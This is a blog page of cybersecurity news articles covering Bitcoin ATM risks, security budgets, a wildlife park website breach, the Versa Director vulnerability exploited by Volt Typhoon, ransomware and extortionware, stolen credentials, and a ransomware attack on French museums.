There is no difference in the operation of these machines from traditional ATMs; however, thanks to the significant value of cryptocurrencies, they can be very attractive to cybercriminals, who will exploit both physical and digital vulnerabilities to their advantage. According to Timothy Bates, an assistant professor of cybersecurity at the University of Michigan, these machines are especially vulnerable to hacking due to the lack of security measures that are often part of the software used in these devices. 

According to Bates, Bitcoin ATMs can be infected by malware, which allows hackers to steal private keys and manipulate transactions through the use of malware. As well as this, an ATM can be compromised as a result of weaknesses in the security of the network, which may allow criminals to intercept communications between the ATM and its server, potentially allowing data theft to take place. As a result of malware installed by hackers on Bitcoin ATMs, they can be compromised, steal private keys, or manipulate transactions. 

It is especially concerning for ATMs that may not receive regular updates or security patches to prevent hackers from stealing funds or capturing private keys. A weakness in the network is also a weakness in the network security system. A compromised machine's network communications can be intercepted by attackers if the ATM's network communications are not adequately secured. Consequently, stolen data can be accessed or the server could be accessed by unauthorized persons, Bates explained. 

Bitcoin ATMs need to be taken seriously because of the threat posed by both hackers and scammers. Since 2020, according to a report released by the Federal Trade Commission this week, the number of scamming incidents has increased by 1,000%. In a curious twist, the risks associated with Bitcoin ATMs are directly proportional to their strengths, according to Joe Dobson, the principal analyst at Mandiant, which is owned by Google Cloud and a company that specializes in cybersecurity. 

There are three main characteristics of Bitcoin: decentralization, permissionlessness, and immutability. There is no way to reverse or reverse a transaction if funds are deposited to the wrong address, according to Dobson. Although many crypto bulls are attracted to Bitcoin because of its decentralization and lack of governance, it is a problem when used in ATMs. There are no regulations in the Bitcoin community that dictate who can run a Bitcoin ATM and who cannot, so independent organizations operate Bitcoin ATMs without any interference from the Bitcoin community," said Dobson. 

In addition to this, some old criminal tricks might be reversible in a traditional banking system, but not so in the Bitcoin world, which comes with its own set of unique challenges. It is possible for someone, for instance, to maliciously place their deposit slips into the bank stack, which can lead to folks being tricked into depositing money into their accounts unknowingly. According to Dobson, "there is the possibility that Bitcoin ATMs could also be subject to a similar attack." 

According to Dobson, "If an attacker compromises an ATM, they will be able to change the recipient wallet address (or "account number"), which in turn will steal the money of the user."  Bitcoin ATMs, however, continue to spread old tricks as well and they also introduce newer threats that are not encountered by cash ATMs. Several Bitcoin ATMs require that users provide personally identifiable information, such as their ID number or even their Social Security number to satisfy "Know Your Customer (KYC)" requirements that are necessary in the financial industry. 

Depending on the level of security that exists on a Bitcoin ATM, this information could be at risk. The Middletown Food Mart, located on the fringes of the town, in a hollowed-out section of the town near the town's main road, has a Bitcoin Depot ATM running alongside a regular cash machine, which blends in with the potato chips, bottled water, and beer on sale. 

Those who live in Middletown know that it is the hometown of Donald Trump's running mate, Ohio Senator J.D. Vance, who, similar to Trump, has refashioned himself as a crypto-advocate and has been speaking out against the adoption of Bitcoin. It is just a few blocks away from the Middletown Food Mart where Vance grew up where he works. Among the best ways to avoid these scams is to be cautious and sceptical about any requests from users who want to make payments through a Bitcoin ATM. It is rare that legitimate businesses if they exist, will request payment in Bitcoin via a machine for their services. 

During a transaction, users must verify the validity of the transaction, particularly checking the recipient's wallet for references to questionable entities," Frei said, adding that an additional precaution can be taken by using licensed ATMs from reliable operators. 

Users will be able to follow certain steps to make sure they are dealing with a Bitcoin ATM or party that is legitimate and owned by someone reputable. Adding to Frei's warning, he stressed the importance of being cautious and not sending bitcoins to unknown wallets. A platform like Chainabuse can help validate the legitimacy of the transaction by examining the risk score of the recipient's wallet, which can help verify their legitimacy. 

In the U.S., Bitcoin Depot operates over 8,000 ATMs, making it the country's largest operator of Bitcoin ATMs. Its chief executive, Brandon Mintz, assured CNBC that the company's software and hardware are designed to deter hackers, although he cautioned consumers not to fall victim to scams or be deceived by them. There seem to be just 10 operators worldwide who manage about 74% of ATMs in the world, as per Frei's analysis of data.
Read more »
IT Sector
Budget Cyber Security cyber security teams Cyber Threats IT Sector

Security Budgets Rise Slowly, But Hiring Slows Down, Research Shows


 

According to the report by IANS Research and Artico Search, there is indeed a fair probability that expanded security budgets will continue to rise in 2024, albeit at a slower pace compared to the last couple of years. For this year, security spending has been jacked up some 8%, one notch higher than the 6% increase in 2023. That's still miles away from the increases of 16% and 17% seen in 2021 and 2022, respectively.

Meanwhile, the security budget grew rather insignificantly, and the share of security spending in an IT portfolio has grown from 8.6% in 2020 to 13.2% in 2024. This means that cybersecurity is finding its place as one of the critical components of an IT setup—at least for organisations which depend most on digital technologies today.

Security teams must become the protective force of organisations but are perennially challenged to not get subjugated by competitive priorities and small budgets. "Security is getting pulled closer to the core of the business," said IANS Senior Research Director Nick Kakolowski. "While the level of protection desired by companies goes up, the tools and skills given to security teams fall short of what would satisfy their growing expectations.".

Reduction in the Recruitment of Security Personnel

One of the most striking trends underscored in this report is the remarkable shrinkage in hiring that is taking place in the cybersecurity sector. Security teams were 12% higher in 2024 than a year earlier, but that growth was slower compared to the 31% jump in 2022 and a 16% increase in 2023. This takes place at a time of general economic uncertainty, with businesses placing greater control on the management of their overall costs.

While security remains a top priority for most organisations, economic pressure has held businesses back from increasing teams at the same rate. With shrinking budgets, most security teams have no alternative but to do more with less, further compounding the task of keeping pace with an unprecedented surge in threats. 

The Future of Cybersecurity Spending Analysts note that, with the world of business strategies hinging on cybersecurity, the budgeting for security will remain on an upward trend albeit at a slower and more incremental pace. The reasoning is that business success increasingly calls for comprehensive security due to increasing dependence on digital technologies in all its functions. Currently, security investments are set to reach $212 billion by 2025; Gartner has 15% growth estimated over its forecast levels by 2024. That kind of projection accentuates beliefs that spending on cybersecurity is going to remain one of the most critical investments for companies. Overall, with continued rises of security budgets—cybersecurity is on a higher spending bracket than IT budgets; the slow hire rate actually points to the hardship organisations face in trying to grow their security teams as fast as they would want. Because another major business function is the need for organisations to strategically pay attention not only to investment in but also to the management and sustainability of their security postures, especially in periods of economic disfavour.

Read more »
Fota Wildlife Park
Cyber Attacks Cyber Threats Data Theft Fota Wildlife Park

Fota Wildlife Park Issues Urgent Warning After Website Cyberattack

 

Fota Wildlife Park in East Cork has issued an urgent warning following a major cyberattack on its website, potentially compromising thousands of customers' personal and financial details. The park advises those who made transactions on its website between May 12 and August 27, 2024, to cancel their debit or credit cards as a precaution. 

The cyberattack was discovered on August 27, prompting Fota Wildlife Park to swiftly engage external forensic cybersecurity experts to investigate the breach. The park has also reported the incident to the Data Protection Commission (DPC) and An Garda Síochána, Ireland’s national police service, as part of its response. Initial investigations revealed that the attackers may have accessed the usernames, passwords, and email addresses of users with accounts on the website. 

There are also concerns that full credit card details may have been compromised, leading to the strong recommendation for customers to cancel their cards and closely monitor their bank statements for any unusual activity. Paul C. Dwyer, President of the International Cyber Threat Task Force, indicated that the attack may have involved a "man-in-the-middle" strategy, where criminals intercepted data as it was entered on the website. This could have enabled them to collect complete credit card details, which might be sold on the dark web. 

The park has taken its website offline to prevent further damage while working to secure its systems. Despite the breach, Fota Wildlife Park remains open to visitors, with tickets available for purchase at the entrance. In a statement, Fota Wildlife Park assured customers that it is treating the situation with the utmost seriousness and has made protecting their personal and financial information a top priority. 

The park is in the process of contacting all customers who may have been affected. Meanwhile, Fota Island Resort, a nearby hotel and golf destination, clarified that it is a completely separate business from Fota Wildlife Park and was not impacted by the cyberattack. The DPC has confirmed that an investigation is underway amid concerns that the breach could lead to targeted phishing attacks and other cyber threats.
Read more »
Vulnerabilities and Exploits
Chinese Hackers CISA Cyber Threats Software Vulnerabilities and Exploits

Chinese Hackers Exploit Serious Flaw in Versa SD-WAN Systems


 

A Chinese cyber-espionage group, known as Volt Typhoon, has been exploiting a newly discovered security flaw in Versa Networks' SD-WAN Director servers. This zero-day vulnerability, identified as CVE-2024-39717, has already been used to infiltrate several organizations. Given the seriousness of this issue, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has listed it among known exploited vulnerabilities, urging immediate corrective actions.

The CVE-2024-39717 vulnerability impacts all versions of Versa Director released before version 22.1.4. The issue originates from a feature in the system's graphical user interface (GUI) that allows for customisation. Versa Director is a crucial part of Versa Networks' software-defined wide area networking (SD-WAN) solutions, which are used by ISPs, MSPs, and large corporations to manage network devices, route traffic, and enforce security policies. Unfortunately, this vulnerability enables attackers to steal user credentials, potentially leading to further attacks.

Dan Maier, Versa's Chief Marketing Officer, noted that this flaw could allow attackers to escalate privileges without authorization. Attackers can initially access Versa Director through high-availability management ports 4566 and 4570, particularly if these ports are left open to the internet. Once inside, they can gain administrator-level credentials, giving them complete control over the system. Maier emphasised that Versa has long advised customers to limit access to these critical ports to prevent such security breaches.

The vulnerability was first discovered by researchers at Lumen Technologies' Black Lotus Labs. They found that Volt Typhoon had been exploiting this flaw since at least June 2024. The attackers used small office/home office (SOHO) devices, a common tactic for this group, to infiltrate vulnerable Versa Director systems via the exposed management ports. After gaining access, the attackers deployed a custom web shell named "VersaMem" to capture plaintext user credentials and monitor the Apache Tomcat web server's incoming traffic.

On June 21, Lumen researchers informed Versa about the vulnerability, shortly after they believed Volt Typhoon started exploiting it. Versa responded by issuing advisories on July 26 and August 8, outlining steps to reduce the risk. By August 26, they had published a detailed security bulletin describing the flaw and providing guidance for customers to protect their systems.

At least five organisations, including four based in the United States, have been compromised due to this vulnerability. These organisations are primarily from the managed service provider, internet service provider, and IT sectors. Given the seriousness of the situation, CISA has mandated that federal agencies apply the necessary mitigations by September 13 or cease using the vulnerable technology until it is secured.

Although the vulnerability was rated as moderately severe with a CVSS score of 6.6 out of 10, Versa has highlighted the significant risks associated with it. While the vulnerability is complex to exploit and requires high-level privileges, it becomes much easier to exploit if the management ports are exposed. In such cases, attackers can upload unauthorized files and execute code via the VersaMem web shell, leading to severe security breaches.

Versa has strongly advised its customers to update their systems to the latest versions, which include security enhancements that make the software more resistant to attacks. They have also recommended following their system hardening and firewall guidelines to reduce the likelihood of exploitation.

The Volt Typhoon group’s exploitation of the CVE-2024-39717 vulnerability highlights the ongoing threat posed by state-backed cyber actors. Although Versa has patched the vulnerability, organizations using Versa Director must act quickly to secure their systems and prevent further breaches. This incident serves as a reminder of the importance of keeping software updated and securing all network entry points to defend against sophisticated cyber threats.

Read more »
Ransomware
Cyber Security Cyber Threats Extortionware Ransomware

Ransomware and Extortionware: The Two Cybersecurity Dangers

Ransomware and Extortionware: The Two Cybersecurity Dangers

In the rapidly changing landscape of cybersecurity dangers, two threats are often in discussion, ransomware and extortionware. While both have some similarities, it is important to understand their differences for efficient defense tactics. 

What is Ransomware?

Ransomware is a type of malware that encrypts a victim’s data, rendering it inaccessible until a ransom is paid. The attackers typically demand payment in cryptocurrency to maintain anonymity. The primary goal of ransomware is to disrupt access to critical data and systems, forcing victims to pay for decryption keys.

The core mechanism of ransomware is data encryption. Once infected, the victim’s files are locked using strong encryption algorithms. Attackers demand a ransom, often accompanied by a deadline, to provide the decryption key. Payments are usually requested in cryptocurrencies like Bitcoin to ensure the attackers’ anonymity. Ransomware can affect individuals, businesses, and even critical infrastructure, causing significant financial and operational damage.

The Rise of Extortionware

Extortionware, on the other hand, encompasses a broader range of tactics beyond mere encryption. It involves stealing sensitive data and threatening to release it unless a ransom is paid. This category includes ransomware but also extends to other forms of cyber extortion such as sextortion, doxing, and Distributed Denial of Service (DDoS) attacks.

Unlike ransomware, extortionware often involves stealing sensitive data before making ransom demands. The primary leverage is the threat of exposing stolen data, which can include personal information, financial records, or confidential business data. Extortionware can employ various methods, including phishing, social engineering, and exploiting vulnerabilities to gain access to data. The threat of public exposure adds a psychological dimension to the attack, increasing the likelihood of victims paying the ransom.

Comparing Ransomware and Extortionware

While both ransomware and extortionware aim to extort money from victims, their methods and impacts differ significantly. Ransomware relies primarily on encryption to lock data, whereas extortionware involves data theft and the threat of exposure. Ransomware leverages the inability to access critical data, while extortionware leverages the fear of sensitive data being exposed publicly. 

Ransomware can disrupt operations by making data inaccessible, whereas extortionware can cause reputational damage and legal consequences if sensitive data is leaked. Ransomware creates urgency through deadlines for payment, while extortionware adds psychological pressure by threatening public exposure.

Read more »
Stolen Credentials
Credential Theft Cyber Security Cyber Threats initial access breaches Malware attacks Password Security Stolen Credentials

Rising Threat of Stolen Credentials and Initial Access Breaches

 

Weak or reused passwords continue to pose significant risks for organizations, as criminals increasingly exploit stolen credentials to access user accounts. This trend has fueled a thriving market for stolen credentials and the initial access they provide. The ENISA Threat Landscape 2023 report highlights a year-over-year growth in the Initial Access Broker (IAB) market, with credentials being the primary commodity for sale.

Stealer malware frequently infiltrates victim machines through social engineering tactics, primarily phishing, and sometimes through paid distribution schemes using the Emotet and Qakbot botnets. Other campaigns entice users to download seemingly legitimate software via malvertising.

ENISA anticipates that future social engineering campaigns will adapt to new defensive measures aimed at protecting credentials from abuse.

Increasing Challenges with Stolen Credentials
Organizations face growing challenges with stolen credentials. The Verizon 2024 Data Breach Investigation Report (DBIR) reveals a 180% increase in attacks exploiting vulnerabilities to initiate breaches compared to the previous year. Stolen credentials were the leading initial action in breaches, accounting for 24%, just ahead of ransomware at 23%.

Fraudsters employ various methods to steal credentials, including malware that steals passwords and sells them on the dark web. Popular tools for this purpose include Redline, Vidar, and Raccoon Stealer. The FBI has warned of cybercriminals using search engine advertisements to impersonate brands and direct users to malicious sites that host ransomware to steal login credentials.

Credentials can also be compromised through brute force attacks, where cybercriminals use tools to test password combinations until the correct one is found. These methods range from simple trial and error to more sophisticated dictionary attacks, exploiting common password choices.

Potential for Major Breaches
The Solarwinds attack, described by Microsoft Corp President Brad Smith as "the largest and most sophisticated attack the world has ever seen," exemplifies the potential danger of stolen credentials. A compromised SolarWinds password was discovered on a private Github repository, where an intern had set the password "solarwinds123" on an account with access to the company's update server.

Other notable examples include the Dropbox breach, which impacted millions of users. A Dropbox employee reused a password from a LinkedIn breach, where millions of passwords were accessed by thieves.

ENISA notes that while abusing valid accounts for initial access is not a new technique, it remains effective for cybercriminals. Misconfigured accounts and those with weak passwords are particularly vulnerable. Although multi-factor authentication (MFA) can prevent many attacks, it is not foolproof, with actors intercepting MFA codes and harassing users with push notifications.

ENISA expects credentials to remain a focal point for cybercrime actors despite technical protective measures, as these actors continually find ways around them.

Cybersecurity experts recognize the danger of stolen credentials and the necessity of strong security measures. However, complacency is not an option. The threat posed by stolen credentials is constantly evolving, necessitating ongoing adaptation.

Organizations must enforce the creation of strong passwords resistant to brute force attacks and other forms of exploitation. Specops Password Policy can help build robust password policies by:

  • Generating personalized dictionary lists to prevent the use of commonly used words within the company.
  • Providing immediate and interactive updates to users when changing passwords.
  • Restricting the use of usernames, display names, certain words, consecutive characters, incremental passwords, and repeating parts of previous passwords.
  • Applying these features to any GPO level, computer, individual user, or group within the organization.
  • Continuously scanning for and blocking over 4 billion compromised passwords, ensuring that breached passwords are found daily.
Increasing overall password security, enforcing good password hygiene, and eliminating weak passwords enhance the security of Active Directory environments and privileged accounts. Organizations must prepare their defenses by scanning for password vulnerabilities in Active Directory to detect weak and compromised passwords.
Read more »
Ransomware
Cyber Threats Data Breach France Paris Olympics Ransomware

Louvre and Top French Museums Fall Victim to Ransomware Attack, Including Olympic Sites

 



Over 40 museums in France, including the Grand Palais, a key venue for the upcoming Paris Olympics, and the world-famous Louvre, recently fell victim to a discernible ransomware attack. The breach, which occurred over the weekend of August 3rd, has raised concerns about the security of cultural institutions in the country.

According to police sources, the cyberattack specifically targeted a system that centralises financial data for various museums. This attack disrupted operations and led to the hackers demanding a ransom. They threatened to release sensitive financial information unless their demands were met. Although the exact amount of the ransom has not been disclosed, the incident has sparked a criminal investigation focusing on data system breaches and extortion by an organised gang.

The national cybersecurity agency of France, Anssi, confirmed that it had been notified of the breach and was actively investigating the situation. Importantly, the agency clarified that the compromised systems are not involved in any Olympic-related events, alleviating some concerns about the security of the upcoming games. The Grand Palais, which is scheduled to host fencing and martial arts during the Olympics, acknowledged that it had been affected by the attack but declined to share further details about the extent of the damage or the ongoing investigation.

Interestingly, the Louvre, initially mentioned as a potential target by the police, has since denied being impacted by the cyberattack. This denial has added a layer of confusion to the situation, as conflicting reports about the scope of the attack have emerged. Despite the Louvre's statement, the fact remains that the ransomware attack has exponentially impacted the museum sector in France, further stressing the vulnerability of even the most renowned cultural institutions to cyber threats.

Ransomware attacks have become increasingly common in recent years, where criminals infiltrate computer systems, encrypt data, and demand payment in exchange for unlocking the compromised systems. This incident highlights the expanding threat of cybercrime, even against prestigious and heavily protected targets like the Grand Palais and other prominent French museums.

As the investigation continues, French authorities are working to identify the perpetrators and prevent future attacks on the nation's cultural heritage. This incident calls for proper implementation of robust cybersecurity measures, especially as the world prepares for major international events like the Paris Olympics. 

The broader implications of this ransomware attack may push cultural institutions worldwide to reassess their digital security strategies, ensuring that their valuable assets remain protected from the growing trajectory of unique threats. 


Read more »
Subscribe to: Posts (Atom)